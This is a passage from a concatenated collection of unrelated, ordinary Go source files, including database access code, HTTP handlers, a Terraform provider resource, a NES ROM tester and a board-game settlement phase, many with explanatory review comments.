	namespace TEXT NOT NULL,
	resource TEXT NOT NULL,
	inserted DATETIME DEFAULT CURRENT_TIMESTAMP,
	lastError TEXT,
	enabled BOOLEAN,
	errorTimestamp DATETIME DEFAULT NULL
	);`)
	return cfgmgr, err
}
// RequestFilter selects rows in List/Add/Delete queries; a nil field means
// "don't filter on this column". Pointer fields let callers distinguish
// "unset" from zero values (use _TRUE/_FALSE for the bools).
type RequestFilter struct {
	Schema    *string
	Plugin    *string
	Namespace *string
	Resource  *string
	HasError  *bool
	Enabled   *bool
	Id        *int
}
// Add inserts a new archive request (enabled by default) unless a row with
// the same (schema, plugin, namespace, resource) already exists.
// NOTE(review): the List-then-Insert pair is not atomic — concurrent Adds
// could insert duplicates; confirm single-writer usage.
func (cfgmgr *ConfigManager) Add(req ArchiveRequest) error {
	filter := &RequestFilter{
		Schema:    &req.Schema,
		Plugin:    &req.Plugin,
		Namespace: &req.URI.Namespace,
		Resource:  &req.URI.Resource,
	}
	results, err := cfgmgr.List(filter)
	if err != nil {
		return err
	} else if len(results) == 0 {
		stmt := "INSERT INTO requests(schema, plugin, namespace, resource, enabled) VALUES (?, ?, ?, ?, 1);"
		_, err := cfgmgr.db.Exec(stmt, req.Schema, req.Plugin, req.URI.Namespace, req.URI.Resource)
		return err
	}
	return nil
}
// deletes the request from the config manager; returns true if anyone else uses the same subscription URI
// On a database error it conservatively returns true so callers do not tear
// down the underlying subscription based on a failed delete.
func (cfgmgr *ConfigManager) Delete(req ArchiveRequest) (bool, error) {
	stmt := "DELETE FROM requests WHERE schema=? AND plugin=? AND namespace=? AND resource=?;"
	_, err := cfgmgr.db.Exec(stmt, req.Schema, req.Plugin, req.URI.Namespace, req.URI.Resource)
	if err != nil {
		return true, err
	}
	// Any remaining row on the same namespace/resource keeps the
	// subscription alive.
	filter := &RequestFilter{
		Namespace: &req.URI.Namespace,
		Resource:  &req.URI.Resource,
	}
	existingSubs, err := cfgmgr.List(filter)
	return len(existingSubs) > 0, err
}
// Disable marks the matching request as disabled; it returns true if any
// *enabled* request still uses the same subscription URI (i.e. the live
// subscription must be kept). On error it conservatively returns true.
func (cfgmgr *ConfigManager) Disable(req ArchiveRequest) (bool, error) {
	stmt := "UPDATE requests SET enabled = 0 WHERE schema=? AND plugin=? AND namespace=? AND resource=?;"
	_, err := cfgmgr.db.Exec(stmt, req.Schema, req.Plugin, req.URI.Namespace, req.URI.Resource)
	if err != nil {
		return true, err
	}
	filter := &RequestFilter{
		Namespace: &req.URI.Namespace,
		Resource:  &req.URI.Resource,
		Enabled:   &_TRUE,
	}
	existingSubs, err := cfgmgr.List(filter)
	return len(existingSubs) > 0, err
}
// Enable re-activates the matching archive request.
func (cfgmgr *ConfigManager) Enable(req ArchiveRequest) error {
	stmt := "UPDATE requests SET enabled = 1 WHERE schema=? AND plugin=? AND namespace=? AND resource=?;"
	_, err := cfgmgr.db.Exec(stmt, req.Schema, req.Plugin, req.URI.Namespace, req.URI.Resource)
	return err
}
// MarkErrorURI records subErr (with the current time) on every request that
// subscribes to uri. An empty error string is a no-op.
func (cfgmgr *ConfigManager) MarkErrorURI(uri types.SubscriptionURI, subErr string) error {
	if subErr == "" {
		return nil
	}
	stmt := "UPDATE requests SET lastError = ?, errorTimestamp = ? WHERE namespace = ? AND resource = ?"
	_, err := cfgmgr.db.Exec(stmt, subErr, time.Now(), uri.Namespace, uri.Resource)
	return err
}
// ClearErrorURI resets the recorded error state for every request that
// subscribes to uri. Note the timestamp is cleared to '' rather than NULL,
// so List will scan it as a non-nil value.
func (cfgmgr *ConfigManager) ClearErrorURI(uri types.SubscriptionURI) error {
	stmt := "UPDATE requests SET lastError = '', errorTimestamp = '' WHERE namespace = ? AND resource = ?"
	_, err := cfgmgr.db.Exec(stmt, uri.Namespace, uri.Resource)
	return err
}
// List returns the archive requests matching filter; a nil filter returns
// every row. Filter values are bound as SQL parameters instead of being
// interpolated into the statement (the previous fmt.Sprintf interpolation
// was injectable). Also fixes the invalid "... WHERE ;" SQL the old code
// produced for a non-nil filter with no fields set.
func (cfgmgr *ConfigManager) List(filter *RequestFilter) ([]ArchiveRequest, error) {
	stmt := "SELECT schema, plugin, namespace, resource, inserted, ifnull(lastError, ''), errorTimestamp, enabled, id FROM requests"
	var args []interface{}
	if filter != nil {
		var clauses []string
		if filter.Schema != nil {
			clauses = append(clauses, "schema=?")
			args = append(args, *filter.Schema)
		}
		if filter.Plugin != nil {
			clauses = append(clauses, "plugin=?")
			args = append(args, *filter.Plugin)
		}
		if filter.Namespace != nil {
			clauses = append(clauses, "namespace=?")
			args = append(args, *filter.Namespace)
		}
		if filter.Resource != nil {
			clauses = append(clauses, "resource=?")
			args = append(args, *filter.Resource)
		}
		if filter.Id != nil {
			clauses = append(clauses, "id=?")
			args = append(args, *filter.Id)
		}
		if filter.HasError != nil {
			if *filter.HasError {
				clauses = append(clauses, "lastError!=''")
			} else {
				clauses = append(clauses, "lastError=''")
			}
		}
		if filter.Enabled != nil {
			if *filter.Enabled {
				clauses = append(clauses, "enabled=1")
			} else {
				clauses = append(clauses, "enabled=0")
			}
		}
		// Only emit WHERE when at least one clause exists.
		if len(clauses) > 0 {
			stmt = fmt.Sprintf("%s WHERE %s", stmt, strings.Join(clauses, " AND "))
		}
	}
	stmt += ";"
	var results []ArchiveRequest
	rows, err := cfgmgr.db.Query(stmt, args...)
	if err != nil {
		return results, err
	}
	defer rows.Close()
	for rows.Next() {
		row := &ArchiveRequest{
			URI: types.SubscriptionURI{},
		}
		// errorTimestamp may be NULL, so scan it into an interface{} first.
		var et interface{}
		if err := rows.Scan(&row.Schema, &row.Plugin, &row.URI.Namespace, &row.URI.Resource, &row.Inserted, &row.LastError, &et, &row.Enabled, &row.Id); err != nil {
			return results, err
		}
		if et != nil {
			row.ErrorTimestamp = et.(time.Time)
		} else {
			row.ErrorTimestamp = time.Unix(0, 0)
		}
		results = append(results, *row)
	}
	// Surface any iteration error instead of silently returning a short list.
	return results, rows.Err()
}
|
package models
import (
"time"
)
// AuthUser mirrors a Django-style auth_user table row (see the xorm column
// tags for the exact schema).
type AuthUser struct {
	Id          int64     `xorm:"pk autoincr"`
	Password    string    `xorm:"varchar(128) not null"`
	LastLogin   time.Time `xorm:"DateTime not null"`
	IsSuperuser bool      `xorm:"BOOL not null"`
	Username    string    `xorm:"varchar(64) unique not null"`
	FirstName   string    `xorm:"varchar(30) not null"`
	LastName    string    `xorm:"varchar(30) not null"`
	Email       string    `xorm:"varchar(254) not null"`
	IsStaff     bool      `xorm:"BOOL not null"`
	IsActive    bool      `xorm:"BOOL not null"`
	DateJoined  time.Time `xorm:"DateTime not null"`
}

// TableName tells xorm which table this struct maps to.
// Receiver renamed from the non-idiomatic `self` per Go convention.
func (au *AuthUser) TableName() string {
	return "auth_user"
}
// GetAuthUser loads the auth_user row with the given primary key.
// It returns (nil, nil) when no such row exists, and (nil, err) on a
// database error.
func GetAuthUser(id int64) (au *AuthUser, err error) {
	au = new(AuthUser)
	var existed bool
	if existed, err = DB().Id(id).Get(au); err != nil {
		return nil, err
	}
	if !existed {
		return nil, nil
	}
	return
}
|
package requests
import (
"github.com/sirupsen/logrus"
"gopkg.in/xmlpath.v2"
"strings"
)
// Xpath wraps a parsed HTML document (Node) together with the parse error,
// for evaluating XPath expressions against it.
type Xpath struct {
	Node *xmlpath.Node
	Err  error
	Path *xmlpath.Path
}
// New parses sHtml as HTML and stores the resulting node tree (or the parse
// error) on the receiver. Callers should check x.Err before querying.
// Receiver renamed from the non-idiomatic `self` per Go convention.
func (x *Xpath) New(sHtml string) {
	rdHtml := strings.NewReader(sHtml)
	x.Node, x.Err = xmlpath.ParseHTML(rdHtml)
}
// Parse2Str evaluates sXpath against the parsed document and returns the
// first match as a string. It returns "" when the expression does not
// compile (the compile error is logged) or matches nothing.
// Receiver renamed from the non-idiomatic `self` per Go convention.
func (x *Xpath) Parse2Str(sXpath string) string {
	var sResult string
	if pathComp, errComp := xmlpath.Compile(sXpath); errComp == nil {
		iter := pathComp.Iter(x.Node)
		if iter.Next() {
			sResult = iter.Node().String()
		}
	} else {
		logrus.Error(errComp)
	}
	return sResult
}
// Parse2Sli evaluates sXpath and returns every match as a string slice
// (nil when nothing matches).
// NOTE(review): MustCompile panics on an invalid expression, unlike
// Parse2Str which logs — confirm callers only pass static expressions.
// Receiver renamed from the non-idiomatic `self` per Go convention.
func (x *Xpath) Parse2Sli(sXpath string) []string {
	var sliResult []string
	pathComp := xmlpath.MustCompile(sXpath)
	iter := pathComp.Iter(x.Node)
	for iter.Next() {
		sliResult = append(sliResult, iter.Node().String())
	}
	return sliResult
}
|
package api
import (
"encoding/json"
"log"
"net/http"
)
// messageGetRequest is the POST body for FetchChatsMessages: the id of the
// chat whose messages are requested.
type messageGetRequest struct {
	Chat string
}
// message is one row of the Messages table as serialized to clients.
// Field names (incl. Created_at) are kept as-is because sibling code
// references them; the JSON keys are pinned by the tags.
type message struct {
	Id         string `json:"id"`
	Chat       string `json:"chat"`
	Author     string `json:"author"`
	Text       string `json:"text"`
	Created_at string `json:"created_at"`
}
// FetchChatsMessages handles POST requests returning all messages of a chat,
// ordered by creation time, as a JSON array.
// Fixes: WriteHeader was called after the body had been written (a no-op
// that triggers a "superfluous WriteHeader" warning), rows.Err was never
// checked, and the Encode error was dropped.
func (s *ServerAPI) FetchChatsMessages(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodPost {
		http.Error(w, "Wrong request method", http.StatusBadRequest)
		return
	}
	var from messageGetRequest
	if err := json.NewDecoder(r.Body).Decode(&from); err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	// Verify the chat exists.
	if count, err := countEntity(s.Conn, &from.Chat, "Chats"); err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	} else if count == 0 {
		http.Error(w, "Given chat does not exist!", http.StatusBadRequest)
		return
	}
	// Fetch the chat's messages ordered by creation time.
	const queryStr = "SELECT * FROM Messages WHERE chat=$1 ORDER BY created_at"
	rows, err := s.Conn.Query(queryStr, from.Chat)
	if err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	defer rows.Close()
	// Build the response; rows that fail to scan are logged and skipped.
	msgs := []message{}
	for rows.Next() {
		var m message
		if err := rows.Scan(
			&m.Id,
			&m.Chat,
			&m.Author,
			&m.Text,
			&m.Created_at,
		); err != nil {
			log.Println(err)
			continue
		}
		msgs = append(msgs, m)
	}
	if err := rows.Err(); err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}
	// Encode writes the 200 status implicitly on first write.
	if err := json.NewEncoder(w).Encode(msgs); err != nil {
		log.Println(err)
	}
}
|
// Copyright 2017 Vlad Didenko. All rights reserved.
// See the included LICENSE.md file for licensing information
package slops // import "go.didenko.com/slops"
// ExcludeAll returns a new slice where all strings from the
// rejects slice are removed from the src slice, regardless of
// how many times they occur in either slice. Non-excluded
// duplicates in the src slice are preserved. Both slices
// are expected to be sorted.
//
// It is CollectExcludedAll specialized with the GetAll collector
// (which keeps every surviving item).
func ExcludeAll(src, rejects []string) []string {
	return CollectExcludedAll(src, rejects, GetAll)
}
// CollectExcludedAll applies a Collector to every item which is
// in src slice but not in the rejects slice. All strings from
// the rejects slice are removed from the src slice, regardless
// of how many times they occur in either slice. Non-excluded
// duplicates in the src slice are preserved. Both input slices
// are expected to be sorted.
func CollectExcludedAll(src, rejects []string, collect Collector) []string {
	filtered := make([]string, 0)
	j := 0
	// Merge-style sweep over the two sorted slices.
	for i := 0; i < len(src); {
		switch {
		case j >= len(rejects) || src[i] < rejects[j]:
			// src[i] cannot match any remaining reject: keep it.
			filtered = collect(filtered, src[i])
			i++
		case src[i] > rejects[j]:
			// This reject is exhausted; move to the next one.
			j++
		default:
			// src[i] == rejects[j]: drop this occurrence.
			i++
		}
	}
	return filtered
}
// CollectExcludedByCount applies a Collector to every item which
// is in src slice but not in the rejects slice. Only as many
// duplicates removed from the src slice as occur in the rejects
// slice. Both input slices are expected to be sorted.
// Implemented via CollectVariety with NoOp handlers for the
// reject-only and matched cases.
func CollectExcludedByCount(src, rejects []string, collect Collector) []string {
	return CollectVariety(src, rejects, collect, NoOp, NoOp)
}
// ExcludeAllContrived is a companion function to
// CollectExcludedAllContrived. This is a nerdy exercise
// and is not intended for production use.
func ExcludeAllContrived(src, rejects []string) []string {
	return CollectExcludedAllContrived(src, rejects, GetAll)
}
// CollectExcludedAllContrived has exactly the same functionality
// as CollectExcludedAll function (and is tested against the same
// use cases) but is slower and is presented to demonstrate how
// similar effects can be achieved from the generalised function
// CollectVariety via functional programming means. This is merely
// a nerdy exercise and is not intended for production use.
//
// The two closures share lastExcluded: the second records the most
// recent rejected value, and the first suppresses src items equal
// to it — relying on CollectVariety visiting items in sorted order.
func CollectExcludedAllContrived(src, rejects []string, collect Collector) []string {
	var lastExcluded string
	return CollectVariety(
		src,
		rejects,
		func(dest []string, item string) []string {
			if item != lastExcluded {
				return collect(dest, item)
			}
			return dest
		},
		func(dest []string, item string) []string {
			lastExcluded = item
			return dest
		},
		NoOp)
}
|
package main
import "fmt"
// Student is a small demo struct used by main to show the different
// struct-literal initialization forms.
type Student struct {
	Name string
	Age  int
}
// main demonstrates the various ways to create struct values and pointers.
// (Original Chinese comments translated to English.)
func main() {
	// Positional initialization: field values given in declaration order.
	stu := Student{"test", 10}
	fmt.Println(stu)
	var stu1 = Student{"test", 22}
	fmt.Println(stu1)
	// Keyed initialization: field names written with their values.
	stu2 := Student{
		Name: "ZCR",
		Age:  20,
	}
	fmt.Println(stu2)
	var stu3 = Student{
		Name: "ZCR1",
		Age:  200,
	}
	fmt.Println(stu3)
	// Taking the address of a literal yields a *Student.
	var stu5 = &Student{
		Name: "ZCR1",
		Age:  200,
	}
	// Both access forms work; the compiler dereferences automatically.
	fmt.Println((*stu5).Name)
	fmt.Println(stu5.Name)
	stu6 := &Student{
		Name: "ZCR1",
		Age:  200,
	}
	// Both access forms work; the compiler dereferences automatically.
	fmt.Println((*stu6).Name)
	fmt.Println(stu6.Name)
	stu7 := &Student{"test", 10}
	fmt.Println(*stu7)
	var stu8 = &Student{"test", 22}
	fmt.Println(*stu8)
}
|
package pgeo
import (
"database/sql/driver"
"errors"
"fmt"
)
// Lseg is a line segment and is represented by pairs of points that are the
// endpoints of the segment (PostgreSQL lseg type).
type Lseg [2]Point
// Value serializes the segment for the database (driver.Valuer).
func (l Lseg) Value() (driver.Value, error) {
	return valueLseg(l)
}
// Scan populates the segment from a sql query result (sql.Scanner).
func (l *Lseg) Scan(src interface{}) error {
	return scanLseg(l, src)
}
// valueLseg renders the segment in PostgreSQL's "[(x1,y1),(x2,y2)]" form.
func valueLseg(l Lseg) (driver.Value, error) {
	return fmt.Sprintf(`[%s]`, formatPoints(l[:])), nil
}
// scanLseg parses a database value into *l. A NULL source yields the
// zero segment; any other source must parse to exactly two points.
func scanLseg(l *Lseg, src interface{}) error {
	if src == nil {
		// NULL column: reset to the zero-valued segment.
		*l = NewLseg(Point{}, Point{})
		return nil
	}
	pts, err := parsePointsSrc(src)
	if err != nil {
		return err
	}
	if len(pts) != 2 {
		return errors.New("wrong lseg")
	}
	*l = NewLseg(pts[0], pts[1])
	return nil
}
// randLseg builds a segment from two randomly generated points.
func randLseg(nextInt func() int64) Lseg {
	return Lseg([2]Point{randPoint(nextInt), randPoint(nextInt)})
}
// Randomize fills *l with random data for sqlboiler test fixtures.
// fieldType and shouldBeNull are part of the sqlboiler interface but
// are not used for this type.
func (l *Lseg) Randomize(nextInt func() int64, fieldType string, shouldBeNull bool) {
	*l = randLseg(nextInt)
}
|
package minedive
import (
"nhooyr.io/websocket"
)
// ClientOptions bundles the configuration used when creating a
// minedive client.
type ClientOptions struct {
	// WSopts holds the websocket dial options passed through to the
	// underlying websocket library.
	WSopts websocket.DialOptions
}
|
package searching
// LinearSearch reports whether data occurs anywhere in items by
// scanning the slice front to back. A nil or empty slice yields false.
func LinearSearch(items []int, data int) bool {
	for i := range items {
		if items[i] == data {
			return true
		}
	}
	return false
}
|
package admin
import (
"encoding/json"
admin "github.com/hxangel/bot/libs/admin"
)
// Index is the controller for the admin landing page; it embeds the
// shared AdminBase behaviour.
type Index struct {
	AdminBase
}
// Index renders the admin landing page: it serialises the menu views
// and entries to JSON and exposes them to the template. Marshal
// failures simply skip the corresponding assignment.
func (c *Index) Index() {
	m := admin.NewMenu()
	if data, err := json.Marshal(m.Views); err == nil {
		c.Assign("JsonViews", string(data))
	}
	if data, err := json.Marshal(m.Menus); err == nil {
		c.Assign("JsonMenus", string(data))
		c.Assign("Menus", m.Menus)
	}
}
// Default is an intentionally empty action; presumably a placeholder
// required by the routing framework — confirm against the router setup.
func (c *Index) Default() {
}
|
package main
import (
"fmt"
"net/http"
"net/url"
"time"
"github.com/medhir/musicbrainz/server"
"github.com/rs/cors"
"github.com/medhir/musicbrainz/server/mbclient"
)
// BaseURL is the API Endpoint for the Musicbrainz client.
const BaseURL = "https://musicbrainz.org/ws/2/"

// UserAgent provides a description of the application to be sent with Musicbrainz API requests.
const UserAgent = "Medhir's Musicbrainz Client App / v0.1 / Contact: mail AT medhir.com"
// main wires up the Musicbrainz API client, a CORS-wrapped HTTP mux,
// and serves the application on port 8080.
func main() {
	// Hard client timeout so upstream API calls can never hang forever.
	httpClient := &http.Client{
		Timeout: time.Second * 10}
	// Fixed: the parse error was previously discarded with `_`. BaseURL
	// is a constant, so this only fires if the constant is edited into
	// something invalid — but fail loudly rather than continue with nil.
	parsedURL, err := url.Parse(BaseURL)
	if err != nil {
		fmt.Println("invalid base URL:", err.Error())
		return
	}
	client := &mbclient.MBClient{
		BaseURL:    parsedURL,
		UserAgent:  UserAgent,
		HTTPClient: httpClient}
	mux := http.NewServeMux()
	// NOTE(review): AllowedOrigins is not set, so the cors package uses
	// its default origin policy — confirm that is intended.
	c := cors.New(cors.Options{
		Debug:            true,
		AllowCredentials: true,
		AllowedMethods:   []string{http.MethodGet, http.MethodPost, http.MethodPut, http.MethodDelete},
		AllowedHeaders:   []string{"Authorization", "Content-Type"}})
	server := server.NewServer(mux, client)
	fmt.Println("Listening on port 8080...")
	if err := http.ListenAndServe(":8080", c.Handler(server.Router)); err != nil {
		fmt.Println(err.Error())
	}
}
|
package sonarqube
import (
"fmt"
"github.com/hashicorp/terraform-plugin-sdk/helper/schema"
sonargo "github.com/labd/sonargo/sonar"
)
// resourceSettingsValue defines the Terraform schema for a single
// SonarQube setting: a required key and a required value, importable
// by passing the key as the resource ID.
func resourceSettingsValue() *schema.Resource {
	return &schema.Resource{
		Create: resourceSettingsValueCreate,
		Read:   resourceSettingsValueRead,
		Update: resourceSettingsValueUpdate,
		Delete: resourceSettingsValueDelete,
		Importer: &schema.ResourceImporter{
			State: schema.ImportStatePassthrough,
		},
		Schema: map[string]*schema.Schema{
			"key": {
				Type:     schema.TypeString,
				Required: true,
			},
			"value": {
				Type:     schema.TypeString,
				Required: true,
			},
		},
	}
}
// resourceSettingsValueCreate writes the key/value setting to
// SonarQube and adopts the key as the Terraform resource ID.
func resourceSettingsValueCreate(d *schema.ResourceData, m interface{}) error {
	client := m.(*sonargo.Client)
	key := d.Get("key").(string)
	if _, err := client.Settings.Set(&sonargo.SettingsSetOption{
		Key:   key,
		Value: d.Get("value").(string),
	}); err != nil {
		return err
	}
	d.SetId(key)
	return nil
}
// resourceSettingsValueRead refreshes the Terraform state from the
// setting stored under the resource ID. It errors when the setting no
// longer exists so Terraform can detect drift.
func resourceSettingsValueRead(d *schema.ResourceData, m interface{}) error {
	client := m.(*sonargo.Client)
	results, _, err := client.Settings.Values(&sonargo.SettingsValuesOption{
		Keys: d.Id(),
	})
	if err != nil {
		return err
	}
	if len(results.Settings) == 0 {
		return fmt.Errorf("No project found with key %s", d.Id())
	}
	// Fixed: d.Set errors were previously discarded; propagate them so
	// state-write failures surface instead of silently corrupting state.
	if err := d.Set("key", results.Settings[0].Key); err != nil {
		return err
	}
	return d.Set("value", results.Settings[0].Value)
}
// resourceSettingsValueUpdate handles both key renames (reset the old
// key, adopt the new one as ID) and plain value updates.
func resourceSettingsValueUpdate(d *schema.ResourceData, m interface{}) error {
	client := m.(*sonargo.Client)
	if d.HasChange("key") {
		oldKey, newKey := d.GetChange("key")
		// Remove the setting stored under the previous key first.
		if _, err := client.Settings.Reset(&sonargo.SettingsResetOption{
			Keys: oldKey.(string),
		}); err != nil {
			return err
		}
		d.SetId(newKey.(string))
	}
	_, err := client.Settings.Set(&sonargo.SettingsSetOption{
		Key:   d.Get("key").(string),
		Value: d.Get("value").(string),
	})
	return err
}
// resourceSettingsValueDelete resets the setting identified by the
// resource ID on the server and clears the ID from state.
func resourceSettingsValueDelete(d *schema.ResourceData, m interface{}) error {
	client := m.(*sonargo.Client)
	opt := &sonargo.SettingsResetOption{Keys: d.Id()}
	if _, err := client.Settings.Reset(opt); err != nil {
		return err
	}
	d.SetId("")
	return nil
}
|
package main
import (
"fmt"
"io/ioutil"
"log"
"os"
"path"
"strings"
"github.com/fogleman/nes/nes"
)
// testRom loads the ROM at path and emulates three seconds of console
// time. Any panic raised by the emulator is converted into an error so
// the caller can keep iterating over the remaining ROMs.
func testRom(path string) (err error) {
	defer func() {
		if r := recover(); r != nil {
			// Fixed: the original `err = r.(error)` re-panics when the
			// panic value is not an error (e.g. a string); handle both.
			if e, ok := r.(error); ok {
				err = e
			} else {
				err = fmt.Errorf("%v", r)
			}
		}
	}()
	console, err := nes.NewConsole(path)
	if err != nil {
		return err
	}
	console.StepSeconds(3)
	return nil
}
// main walks the ROM directory named on the command line and prints
// OK/FAIL for every .nes file after briefly emulating it.
func main() {
	args := os.Args[1:]
	if len(args) != 1 {
		log.Fatalln("Usage: go run util/roms.go roms_directory")
	}
	dir := args[0]
	entries, err := ioutil.ReadDir(dir)
	if err != nil {
		panic(err)
	}
	for _, entry := range entries {
		filename := entry.Name()
		if !strings.HasSuffix(filename, ".nes") {
			continue
		}
		full := path.Join(dir, filename)
		if romErr := testRom(full); romErr != nil {
			fmt.Println("FAIL", full)
			fmt.Println(romErr)
		} else {
			fmt.Println("OK ", full)
		}
	}
}
|
package core
import (
"encoding/json"
"er"
"fwb"
"sgs"
)
// playerSData is one player's committed round settlement: how many of
// each resource they spend this round.
type playerSData struct {
	Cereals int
	Meat    int
	Sweater int
}

// pstData is the phase-local state for the round-settlement phase,
// mapping player ID to that player's committed settlement.
type pstData struct {
	ps map[int]*playerSData
}
// pstInit enters the Round Settlement phase: it resets the phase state,
// registers the commit handler, arms the phase timeout, and tells every
// player to start settling.
func pstInit(me *gameImp) *er.Err {
	me.lg.Dbg("Enter Round Settlement phase")
	me.pd = &pstData{
		ps: make(map[int]*playerSData),
	}
	me.setDCE(fwb.CMD_COMMIT_ROUND_SETTLEMENT, pstOnCommitRoundSettlement)
	// 30 seconds for all players to commit before pstOnTimeOut fires.
	me.setTimer(30000, pstOnTimeOut)
	return me.app.SendAllPlayers(sgs.Command{
		ID:  fwb.CMD_ROUND_SETTLEMENT,
		Who: fwb.CMD_WHO_APP,
	})
}
// parsePlayerSData decodes a command payload into a playerSData by
// round-tripping it through JSON. Both failure paths report the same
// structured "payload not decodable" error.
func parsePlayerSData(me *gameImp, command sgs.Command) (*playerSData, *er.Err) {
	decodeErr := func() *er.Err {
		return er.Throw(fwb.E_CMD_PAYLOAD_NOT_DECODABLE, er.EInfo{
			"details":   "failed to decode command payload",
			"commandID": command.ID,
			"payload":   command.Payload,
		}).To(me.lg)
	}
	raw, err := json.Marshal(command.Payload)
	if err != nil {
		return nil, decodeErr()
	}
	psd := playerSData{}
	if err = json.Unmarshal(raw, &psd); err != nil {
		return nil, decodeErr()
	}
	return &psd, nil
}
// pstOnCommitRoundSettlement handles one player's settlement commit:
// it validates the sender, decodes and sanity-checks the settlement,
// records it, and applies the phase once every player has committed.
func pstOnCommitRoundSettlement(me *gameImp, command sgs.Command) *er.Err {
	pid := command.Who
	if me.gd.GetPDIndex(pid) < 0 {
		return er.Throw(fwb.E_CMD_INVALID_CLIENT, er.EInfo{
			"details": "invalid player ID when commit round settlement",
			"ID":      pid,
		})
	}
	pd := me.pd.(*pstData)
	psd, err := parsePlayerSData(me, command)
	if err != nil {
		return err
	}
	if !validateSettlement(me, pid, *psd) {
		// Invalid settlement: bounce it back to the player; the send
		// error (if any) becomes this handler's result.
		err = me.app.SendToPlayer(pid, sgs.Command{
			ID:  fwb.CMD_ROUND_SETTLEMENT_INVALID,
			Who: fwb.CMD_WHO_APP,
		})
		return err
	}
	pd.ps[pid] = psd
	// Once all connected players have committed, settle the round.
	pn := len(me.app.GetPlayers())
	if len(pd.ps) == pn {
		return applyPS(me)
	}
	return err
}
// applyPS applies every committed settlement: each player pays the
// declared cereals/meat/sweaters and earns hearts (2/3/2 per unit)
// plus a house-level bonus, then the updated game data is broadcast
// and the game advances to the rounds-finish phase.
func applyPS(me *gameImp) *er.Err {
	pd := me.pd.(*pstData)
	for pid, psd := range pd.ps {
		printPS(me, pid, *psd)
		hearts := psd.Cereals*2 + psd.Meat*3 + psd.Sweater*2
		px := me.gd.GetPDIndex(pid)
		// House-level bonus. Fixed: the original final branch read
		// `hl >= 2`, which is only reachable for hl >= 3 because
		// hl == 2 is handled above — spell out the real condition.
		switch hl := me.gd.PData[px][fwb.PD_HOUSE_LV]; {
		case hl == 1:
			hearts++
		case hl == 2:
			hearts += 2
		case hl >= 3:
			hearts += 4
		}
		// Apply the delta: add hearts, subtract the spent resources.
		delta := make(fwb.PlayerData, fwb.PD_MAX)
		delta[fwb.PD_PT_HEART] = hearts
		delta[fwb.PD_PT_CEREALS] = -psd.Cereals
		delta[fwb.PD_PT_MEAT] = -psd.Meat
		delta[fwb.PD_PT_SWEATER] = -psd.Sweater
		me.gd.PData[px] = fwb.PDAdd(me.gd.PData[px], delta)
	}
	printRoundInfo(me)
	err := me.app.SendAllPlayers(sgs.Command{
		ID:      fwb.CMD_ROUND_SETTLEMENT_UPDATE,
		Who:     fwb.CMD_WHO_APP,
		Payload: me.gd,
	})
	if err.Importance() >= er.IMPT_DEGRADE {
		return err
	}
	return me.gotoPhase(_P_ROUNDS_FINISH)
}
// printPS logs one player's committed settlement at info level.
func printPS(me *gameImp, cid int, pst playerSData) {
	me.alg.Inf("Settlement from player %v: Cereals %v, Meat %v, and Sweater %v", me.app.GetPlayer(cid).Name(), pst.Cereals, pst.Meat, pst.Sweater)
}
// pstOnTimeOut fires when the settlement timer expires: every player
// who has not yet committed is re-sent the settlement command via the
// mock-player channel. The command parameter is unused; the handler
// always succeeds.
func pstOnTimeOut(me *gameImp, command sgs.Command) *er.Err {
	pd := me.pd.(*pstData)
	for _, p := range me.gd.PData {
		_, found := pd.ps[p[fwb.PD_CLIENT_ID]]
		if !found {
			// NOTE(review): the SendToMockPlayer error is discarded —
			// confirm best-effort delivery is intended here.
			me.app.SendToMockPlayer(p[fwb.PD_CLIENT_ID], sgs.Command{
				ID:  fwb.CMD_ROUND_SETTLEMENT,
				Who: fwb.CMD_WHO_APP,
			})
		}
	}
	return nil
}
// validateSettlement checks that a committed settlement spends only
// non-negative amounts the player actually owns, and respects the pawn
// limit: cereals+meat together, and sweaters alone, must each fit
// within the player's pawn capacity.
func validateSettlement(me *gameImp, playerID int, psd playerSData) bool {
	px := me.gd.GetPDIndex(playerID)
	row := me.gd.PData[px]
	withinStock := psd.Cereals >= 0 && psd.Cereals <= row[fwb.PD_PT_CEREALS] &&
		psd.Meat >= 0 && psd.Meat <= row[fwb.PD_PT_MEAT] &&
		psd.Sweater >= 0 && psd.Sweater <= row[fwb.PD_PT_SWEATER]
	pawnCap := row[fwb.PD_MAX_PAWNS]
	withinPawns := psd.Cereals+psd.Meat <= pawnCap && psd.Sweater <= pawnCap
	return withinStock && withinPawns
}
|
/*
Copyright SecureKey Technologies Inc. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package mocks
import (
fab "github.com/hyperledger/fabric-sdk-go/api/apifabclient"
"github.com/hyperledger/fabric-sdk-go/pkg/fabric-client/txn"
"github.com/pkg/errors"
)
// MockTransactor provides an implementation of Transactor that exposes all its context.
type MockTransactor struct {
	// Ctx is the fabric context used for signing and transaction IDs.
	Ctx fab.Context
	// ChannelID names the channel proposals are built for.
	ChannelID string
	// Orderers are the endpoints transactions are submitted to.
	Orderers []fab.Orderer
}
// CreateTransactionID creates a Transaction ID based on the current context.
func (t *MockTransactor) CreateTransactionID() (fab.TransactionID, error) {
	txid, err := txn.NewID(t.Ctx)
	if err == nil {
		return txid, nil
	}
	return fab.TransactionID{}, errors.WithMessage(err, "new transaction ID failed")
}
// CreateChaincodeInvokeProposal creates a Transaction Proposal based on the current context and channel config.
func (t *MockTransactor) CreateChaincodeInvokeProposal(request fab.ChaincodeInvokeRequest) (*fab.TransactionProposal, error) {
	txid, err := t.CreateTransactionID()
	if err != nil {
		return nil, errors.WithMessage(err, "create transaction ID failed")
	}
	proposal, err := txn.CreateChaincodeInvokeProposal(txid, t.ChannelID, request)
	if err != nil {
		return nil, errors.WithMessage(err, "new transaction proposal failed")
	}
	return proposal, nil
}
// SendTransactionProposal sends a TransactionProposal to the target peers.
func (t *MockTransactor) SendTransactionProposal(proposal *fab.TransactionProposal, targets []fab.ProposalProcessor) ([]*fab.TransactionProposalResponse, error) {
	return txn.SendProposal(t.Ctx, proposal, targets)
}
// CreateTransaction creates a transaction with proposal response.
func (t *MockTransactor) CreateTransaction(request fab.TransactionRequest) (*fab.Transaction, error) {
	return txn.New(request)
}
// SendTransaction sends a transaction to the chain’s orderer service (one or more orderer endpoints) for consensus and committing to the ledger.
func (t *MockTransactor) SendTransaction(tx *fab.Transaction) (*fab.TransactionResponse, error) {
